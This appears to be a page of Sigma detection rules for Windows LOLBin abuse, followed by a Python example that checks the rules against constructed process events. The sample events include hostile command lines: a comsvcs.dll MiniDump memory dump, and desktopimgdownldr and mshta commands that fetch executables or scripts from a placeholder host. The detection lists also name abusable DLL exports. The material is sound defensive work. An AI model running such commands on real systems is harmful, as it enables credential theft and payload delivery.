Techniques
Sample rules
Suspicious Desktopimgdownldr Target File
- source: sigma
- techniques:
- t1105
Description
Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
Detection logic
condition: selection and not filter1 and not filter2
filter1:
    TargetFilename|contains: C:\Windows\
filter2:
    TargetFilename|contains:
        - .jpg
        - .jpeg
        - .png
selection:
    Image|endswith: \svchost.exe
    TargetFilename|contains: \Personalization\LockScreenImage\
Suspicious RASdial Activity
- source: sigma
- techniques:
- t1059
Description
Detects suspicious process execution related to rasdial.exe
Detection logic
condition: selection
selection:
    Image|endswith: rasdial.exe
MsiExec Web Install
- source: sigma
- techniques:
- t1105
- t1218
- t1218.007
Description
Detects suspicious msiexec process starts with a web address as a parameter
Detection logic
condition: selection
selection:
    CommandLine|contains|all:
        - ' msiexec'
        - ://
Potentially Suspicious Rundll32 Activity
- source: sigma
- techniques:
- t1218
- t1218.011
Description
Detects suspicious execution of rundll32 with calls to specific DLL exports that have known LOLBin functionality
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_parent_cpl:
    CommandLine|contains|all:
        - Shell32.dll
        - Control_RunDLL
        - .cpl
    ParentCommandLine|contains: .cpl
    ParentImage: C:\Windows\System32\control.exe
filter_main_screensaver:
    CommandLine|contains: shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver
filter_main_startmenu:
    CommandLine|endswith: '.cpl",'
    CommandLine|startswith: '"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\System32\'
    ParentImage: C:\Windows\System32\control.exe
selection:
    - CommandLine|contains|all:
          - 'javascript:'
          - .RegisterXLL
    - CommandLine|contains|all:
          - url.dll
          - OpenURL
    - CommandLine|contains|all:
          - url.dll
          - OpenURLA
    - CommandLine|contains|all:
          - url.dll
          - FileProtocolHandler
    - CommandLine|contains|all:
          - zipfldr.dll
          - RouteTheCall
    - CommandLine|contains|all:
          - shell32.dll
          - Control_RunDLL
    - CommandLine|contains|all:
          - shell32.dll
          - ShellExec_RunDLL
    - CommandLine|contains|all:
          - mshtml.dll
          - PrintHTML
    - CommandLine|contains|all:
          - advpack.dll
          - LaunchINFSection
    - CommandLine|contains|all:
          - advpack.dll
          - RegisterOCX
    - CommandLine|contains|all:
          - ieadvpack.dll
          - LaunchINFSection
    - CommandLine|contains|all:
          - ieadvpack.dll
          - RegisterOCX
    - CommandLine|contains|all:
          - ieframe.dll
          - OpenURL
    - CommandLine|contains|all:
          - shdocvw.dll
          - OpenURL
    - CommandLine|contains|all:
          - syssetup.dll
          - SetupInfObjectInstallAction
    - CommandLine|contains|all:
          - setupapi.dll
          - InstallHinfSection
    - CommandLine|contains|all:
          - pcwutl.dll
          - LaunchApplication
    - CommandLine|contains|all:
          - dfshim.dll
          - ShOpenVerbApplication
    - CommandLine|contains|all:
          - dfshim.dll
          - ShOpenVerbShortcut
    - CommandLine|contains|all:
          - scrobj.dll
          - GenerateTypeLib
          - http
    - CommandLine|contains|all:
          - shimgvw.dll
          - ImageView_Fullscreen
          - http
    - CommandLine|contains|all:
          - comsvcs.dll
          - MiniDump
Suspicious Desktopimgdownldr Command
- source: sigma
- techniques:
- t1105
Description
Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet
Detection logic
condition: ( selection1 and not selection1_filter ) or selection_reg
selection1:
    CommandLine|contains: ' /lockscreenurl:'
selection1_filter:
    CommandLine|contains:
        - .jpg
        - .jpeg
        - .png
selection_reg:
    CommandLine|contains|all:
        - reg delete
        - \PersonalizationCSP
Suspicious Process Start Locations
- source: sigma
- techniques:
- t1036
Description
Detects suspicious processes run from unusual locations
Detection logic
condition: selection
selection:
    - Image|contains:
          - :\RECYCLER\
          - :\SystemVolumeInformation\
    - Image|startswith:
          - C:\Windows\Tasks\
          - C:\Windows\debug\
          - C:\Windows\fonts\
          - C:\Windows\help\
          - C:\Windows\drivers\
          - C:\Windows\addins\
          - C:\Windows\cursors\
          - C:\Windows\system32\tasks\
Network Reconnaissance Activity
- source: sigma
- techniques:
- t1082
- t1087
Description
Detects a set of suspicious network-related commands often used in the reconnaissance stage
Detection logic
condition: selection
selection:
    CommandLine|contains|all:
        - nslookup
        - _ldap._tcp.dc._msdcs.
MSHTA Execution with Suspicious File Extensions
- source: sigma
- techniques:
- t1059
- t1059.007
- t1140
- t1218
- t1218.005
Description
Detects execution of mshta.exe with arguments whose file extensions do not typically denote HTA (HTML Application) content, such as .png, .jpg, .zip, .pdf and others; such files are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications containing VBScript or JScript. Threat actors often abuse this LOLBin to download and execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.
Detection logic
condition: all of selection_*
selection_cli:
    CommandLine|contains:
        - .7z
        - .avi
        - .bat
        - .bmp
        - .conf
        - .csv
        - .dll
        - .doc
        - .gif
        - .gz
        - .ini
        - .jpe
        - .jpg
        - .json
        - .lnk
        - .log
        - .mkv
        - .mp3
        - .mp4
        - .pdf
        - .png
        - .ppt
        - .rar
        - .rtf
        - .svg
        - .tar
        - .tmp
        - .txt
        - .xls
        - .xml
        - .yaml
        - .yml
        - .zip
        - vbscript
selection_img:
    - Image|endswith: \mshta.exe
    - OriginalFileName: mshta.exe
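To see how the selection/filter logic of the rundll32, desktopimgdownldr and mshta rules above behaves on real-looking events, here is an added example that is not code from this page or from the Sigma project. It implements only the field modifiers these rules use (contains, startswith, endswith and the |all qualifier), compares case-insensitively as Sigma does, and hand-translates each rule's condition line into a Python function rather than parsing Sigma's condition grammar. The process-creation events, the example.invalid host, the paths and the helper names (proc, alerts, match) are constructed for the example.

```python
"""Evaluate three of the page's Sigma selections over sample process events.

Added example, not code from this page or the Sigma project. It implements
only the modifiers these rules use (contains, startswith, endswith, |all)
and hand-translates each rule's condition into a Python function instead of
parsing Sigma's condition grammar. Events, hosts and paths are constructed.
"""


def _clause(event: dict, key: str, expected) -> bool:
    """One 'Field|modifier' clause. Sigma compares case-insensitively, and a
    list of values is OR'd unless the 'all' modifier is present."""
    field, *mods = key.split("|")
    value = str(event.get(field, "")).lower()
    wanted = expected if isinstance(expected, list) else [expected]
    wanted = [str(w).lower() for w in wanted]
    if "contains" in mods:
        hit = lambda w: w in value
    elif "startswith" in mods:
        hit = value.startswith
    elif "endswith" in mods:
        hit = value.endswith
    else:  # no modifier: exact (case-insensitive) comparison
        hit = lambda w: w == value
    return all(map(hit, wanted)) if "all" in mods else any(map(hit, wanted))


def match(event: dict, selection) -> bool:
    """A mapping ANDs its clauses; a list of mappings ORs its members."""
    if isinstance(selection, list):
        return any(match(event, s) for s in selection)
    return all(_clause(event, k, v) for k, v in selection.items())


# Subset of the 'Potentially Suspicious Rundll32 Activity' selection plus its
# control.exe and screensaver filters (the full rule lists more exports).
RUNDLL32_SELECTION = [
    {"CommandLine|contains|all": ["javascript:", ".RegisterXLL"]},
    {"CommandLine|contains|all": ["url.dll", "OpenURL"]},
    {"CommandLine|contains|all": ["shell32.dll", "Control_RunDLL"]},
    {"CommandLine|contains|all": ["advpack.dll", "LaunchINFSection"]},
    {"CommandLine|contains|all": ["comsvcs.dll", "MiniDump"]},
]
RUNDLL32_FILTERS = [
    {"CommandLine|contains|all": ["Shell32.dll", "Control_RunDLL", ".cpl"],
     "ParentCommandLine|contains": ".cpl",
     "ParentImage": r"C:\Windows\System32\control.exe"},
    {"CommandLine|contains": "shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver"},
]


def rundll32_suspicious(event: dict) -> bool:
    """condition: selection and not 1 of filter_main_*"""
    return match(event, RUNDLL32_SELECTION) and not match(event, RUNDLL32_FILTERS)


def desktopimgdownldr_suspicious(event: dict) -> bool:
    """condition: (selection1 and not selection1_filter) or selection_reg"""
    url = match(event, {"CommandLine|contains": " /lockscreenurl:"})
    image_ext = match(event, {"CommandLine|contains": [".jpg", ".jpeg", ".png"]})
    reg_wipe = match(event, {"CommandLine|contains|all": ["reg delete", r"\PersonalizationCSP"]})
    return (url and not image_ext) or reg_wipe


MSHTA_EXTENSIONS = [".7z", ".bat", ".dll", ".doc", ".jpg", ".pdf", ".png", ".txt", ".zip", "vbscript"]


def mshta_suspicious(event: dict) -> bool:
    """condition: all of selection_* (image OR original name, AND an odd extension)"""
    is_mshta = match(event, [{"Image|endswith": r"\mshta.exe"}, {"OriginalFileName": "mshta.exe"}])
    return is_mshta and match(event, {"CommandLine|contains": MSHTA_EXTENSIONS})


def proc(image: str, cmd: str, parent: str = r"C:\Windows\explorer.exe", parent_cmd: str = "") -> dict:
    """Constructed process-creation event using Sigma's field names."""
    return {"Image": image, "CommandLine": cmd, "ParentImage": parent,
            "ParentCommandLine": parent_cmd, "OriginalFileName": image.rsplit("\\", 1)[-1]}


SYS32 = r"C:\Windows\System32"
EVENTS = {  # constructed samples; example.invalid is a placeholder host
    "rundll32_minidump": proc(SYS32 + r"\rundll32.exe",
        r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Users\Public\l.dmp full",
        SYS32 + r"\cmd.exe", "cmd.exe"),
    "rundll32_cpl_from_control": proc(SYS32 + r"\rundll32.exe",  # benign applet launch, filtered out
        r'"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\System32\intl.cpl",',
        SYS32 + r"\control.exe", r'"C:\Windows\System32\control.exe" intl.cpl'),
    "desktopimgdownldr_exe": proc(SYS32 + r"\desktopimgdownldr.exe",
        r"desktopimgdownldr.exe /lockscreenurl:https://example.invalid/update.exe /eventName:desktopimgdownldrdesktop"),
    "desktopimgdownldr_wallpaper": proc(SYS32 + r"\desktopimgdownldr.exe",  # benign, image extension
        r"desktopimgdownldr.exe /lockscreenurl:https://example.invalid/wallpaper.jpg /eventName:desktopimgdownldrdesktop"),
    "reg_personalizationcsp": proc(SYS32 + r"\reg.exe",
        r"reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP /f"),
    "mshta_pdf_polyglot": proc(SYS32 + r"\mshta.exe", r"mshta.exe https://example.invalid/invoice.pdf"),
    "mshta_plain_hta": proc(SYS32 + r"\mshta.exe", r"mshta.exe C:\Users\Public\setup.hta"),
}


def alerts(events: dict = EVENTS) -> dict:
    """Map each event name to the rules it triggers."""
    rules = {"rundll32": rundll32_suspicious, "desktopimgdownldr": desktopimgdownldr_suspicious,
             "mshta": mshta_suspicious}
    return {name: [r for r, fn in rules.items() if fn(ev)] for name, ev in events.items()}


if __name__ == "__main__":
    for name, hits in alerts().items():
        print(f"{name:28} {hits or 'no alert'}")
```

The two benign events show why the filters matter: a control panel applet launched by control.exe hits the shell32.dll/Control_RunDLL selection but is excluded by filter_main_parent_cpl, and a lock-screen wallpaper with a .jpg extension hits selection1 but is excluded by selection1_filter. Note the desktopimgdownldr rule still fires on an unrelated reg.exe command that wipes the PersonalizationCSP key, because selection_reg is OR'd in without any image constraint.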
Sysprep on AppData Folder
- source: sigma
- techniques:
- t1059
Description
Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)
Detection logic
condition: selection
selection:
    CommandLine|contains: \AppData\
    Image|endswith: \sysprep.exe